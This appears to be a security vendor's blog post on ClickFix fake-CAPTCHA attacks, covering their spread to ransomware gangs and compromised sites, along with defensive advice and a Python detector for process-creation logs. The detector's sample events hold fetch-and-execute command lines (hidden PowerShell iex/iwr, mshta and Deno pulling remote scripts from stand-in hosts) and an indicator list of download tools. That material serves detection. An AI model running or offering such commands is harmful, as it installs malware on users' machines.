ClickFix Went from Bad to Worse. Ransomware Gangs Are Using It Now.

Two months ago we wrote about ClickFix as the top initial access technique. Since then, ransomware groups have adopted it, attackers compromised Harvard's and Oxford's websites to deliver it, and Apple had to patch macOS to defend against it.

In April, we wrote about ClickFix as the single most common way attackers were getting into corporate networks. At the time, Cato Networks reported it in 57.5% of all identifiable incidents. CrowdStrike documented a 563% increase in fake CAPTCHA lures.

That was two months ago. It’s gotten worse.

Quick refresher: what ClickFix actually is

You visit a website. A popup appears asking you to verify you’re human, or telling you a font needs to be installed, or that your browser needs an update. The instructions say to press Win+R (or open Terminal on Mac), paste a command, and hit Enter.

That command downloads malware. The user ran it themselves, willingly, because they thought they were fixing a problem or proving they’re not a bot. No email attachment. No suspicious download. The user is the delivery mechanism.

What changed in the last two months

Ransomware gangs adopted ClickFix as their primary entry point. The LeakNet ransomware group is now using ClickFix to get into corporate environments. They pair it with a technique researchers call “bring your own runtime,” installing a legitimate JavaScript runtime (Deno) and running malicious code through it. Because Deno is a signed, legitimate developer tool, it bypasses most endpoint security. The payload runs entirely in memory, leaving minimal forensic evidence. The Termite and Interlock ransomware groups have adopted ClickFix as well.

When ransomware operators adopt a technique, it means the technique works reliably enough to build an entire criminal operation around.

Attackers compromised thousands of legitimate websites to serve ClickFix lures. A threat actor called DriveSurge (documented by Silent Push on June 1) has been hijacking legitimate, high-reputation websites and injecting malicious JavaScript. Visitors get profiled through a traffic distribution system, and qualifying targets see either a fake browser update or a ClickFix CAPTCHA prompt. Separately, a campaign exploiting a Ghost CMS vulnerability (CVE-2026-26980) planted ClickFix payloads on over 700 websites, including Harvard, Oxford, and Auburn university portals, DuckDuckGo, fintech companies, and media outlets.

These aren’t sketchy download sites. They’re websites your staff would have no reason to distrust.

Apple had to ship a macOS patch specifically to address it. In macOS Tahoe 26.4, Apple added a Terminal warning that blocks pasting and executing potentially harmful commands. They did this because ClickFix variants targeting Mac users appeared in early 2026, using macOS Script Editor to run malicious AppleScript. The Atomic Stealer malware was distributed this way. When Apple builds a new OS feature to address a social engineering technique, that technique has reached a certain scale.

The problem for professional services firms

If your staff regularly researches anything online (case law, tax codes, property records, vendor comparisons, real estate listings), they’re visiting the kinds of websites being compromised. University portals. Industry publications. Government resources.

The attack doesn’t arrive by email, which means email security tools don’t see it. It doesn’t involve downloading a file, which means traditional endpoint protection may not flag it. The user runs the command themselves, which means the system treats it as an authorized action.

Your security awareness training probably covers phishing emails and suspicious attachments. It probably doesn’t cover fake CAPTCHA prompts that ask you to paste something into a command prompt.

What to do about it

Update your training. Show your team what a ClickFix prompt looks like. The message is usually “Verify you are human,” “Install missing font,” or “Update your browser.” The giveaway is the instruction to open a command prompt or terminal and paste something. No legitimate website will ever ask you to do this. Make it a rule: if a website asks you to paste something into a command prompt, close the tab.

Review your endpoint policies. Can standard users run PowerShell scripts? Can they execute commands through Win+R? If there’s no business reason for non-IT staff to use these tools, restrict access. This won’t stop every variant, but it raises the barrier significantly.
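The endpoint-policy review above is easier to scope once you can see how a ClickFix paste actually shows up in process telemetry: the pasted command is launched by the Run dialog, so the shell, PowerShell or mshta process has explorer.exe as its parent, and the command line carries the download-and-execute switches the lure relies on. The following Python is an added example, not code from the original post or from Artech Solutions. It runs over a few constructed process-creation records shaped like the fields in Windows Security event 4688 or Sysmon event 1 (user, parent image, image, command line); the usernames, paths and `example.invalid` hostnames are made up for the example. It also flags the "bring your own runtime" pattern from the LeakNet description, a developer runtime such as Deno executing a script fetched from a remote URL.

```python
"""Flag ClickFix-style launches in Windows process-creation records.

Added example (not from the original post). Scans constructed events
shaped loosely like Security event 4688 / Sysmon event 1 fields and
flags: (a) a shell/script interpreter started by explorer.exe (the
Win+R Run-dialog path) with download-and-execute indicators on its
command line, and (b) a developer runtime (Deno) executing a remote
script, the "bring your own runtime" variant.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    user: str
    parent_image: str
    image: str
    command_line: str


# Process images a Win+R paste typically ends up launching.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Signed developer runtime abused in the BYOR variant described in the post.
RUNTIMES = {"deno.exe"}

# Command-line indicators as (pattern, label) pairs; chosen for this example.
INDICATORS = [
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iex|invoke-expression|invoke-webrequest|iwr|curl|wget|bitsadmin)\b", re.I), "download/execute"),
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"\bmshta\b.*https?://", re.I), "mshta remote"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: ProcessEvent) -> list[str]:
    """Return reasons this event looks like a ClickFix launch, or [] if not."""
    image = basename(event.image)
    if image not in INTERPRETERS and image not in RUNTIMES:
        return []
    hits = [label for pat, label in INDICATORS if pat.search(event.command_line)]
    # BYOR: runtime pulling code from the network is suspicious whatever its parent.
    if image in RUNTIMES and "remote URL" in hits:
        return ["developer runtime executing remote script"] + hits
    # Require both the Run-dialog parent and an indicator, so an admin simply
    # opening PowerShell from Win+R is not flagged on its own.
    if basename(event.parent_image) == "explorer.exe" and hits:
        return ["launched from explorer.exe (Run dialog / Win+R)"] + hits
    return []


def scan(events: list[ProcessEvent]) -> list[tuple[str, str, list[str]]]:
    """(user, image, reasons) for every flagged event, in input order."""
    return [(e.user, basename(e.image), analyze(e)) for e in events if analyze(e)]


# Constructed sample telemetry; all names, paths and hosts are fictional.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent("CORP\\jsmith", r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -c "iex (iwr http://example.invalid/verify.txt)"'),  # fake CAPTCHA paste
    ProcessEvent("CORP\\jsmith", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://example.invalid/captcha.hta"),                                # mshta variant
    ProcessEvent("CORP\\dev1", r"C:\Windows\System32\cmd.exe", r"C:\Users\dev1\.deno\bin\deno.exe",
                 "deno run -A https://example.invalid/loader.ts"),                            # BYOR variant
    ProcessEvent("CORP\\admin", r"C:\Windows\explorer.exe", PS, "powershell"),               # benign: shell from Run box
    ProcessEvent("CORP\\dev1", r"C:\Program Files\Microsoft VS Code\Code.exe", PS,
                 'powershell -NoProfile -c "Get-ChildItem"'),                                # benign: editor task
]

if __name__ == "__main__":
    for user, image, reasons in scan(SAMPLE_EVENTS):
        print(f"{user} {image}: {', '.join(reasons)}")
```

Run against the constructed sample it flags the first three events and leaves the two benign launches alone. When triaging a hit, the Run dialog's own history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` records what the user pasted, which confirms the Win+R path even where command-line logging was not enabled. The thresholds here are deliberately simple; in production you would tune the indicator list to your own PowerShell usage and feed the logic from your SIEM's process-creation events rather than a hand-built list.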

Keep browsers and operating systems updated. Apple’s macOS Tahoe 26.4 patch specifically addresses the Terminal paste-and-execute pattern. Chrome and Edge have their own protections. These updates matter more than usual here.

DNS filtering catches some of this. The DriveSurge campaign uses a traffic distribution system (zTDS) to redirect users from compromised sites to malware infrastructure. DNS-level filtering can block known malicious redirect domains before the ClickFix prompt ever loads.

Brief your team on the “legitimate website” problem. The old advice was “don’t visit sketchy websites.” That doesn’t apply here. Harvard’s website was compromised. The attack comes from places people trust. The training message needs to shift from “be careful where you browse” to “be suspicious of any popup that asks you to run a command, no matter what site you’re on.”


This is an update to our April post, "Most Cyberattacks Start the Same Way. Here's What the Data Says," which first covered ClickFix as the leading initial access technique. The situation has escalated since then.

Artech Solutions provides managed IT and cybersecurity services to Iowa law firms and professional services companies. If you want to review your firm’s exposure to these kinds of attacks, get in touch.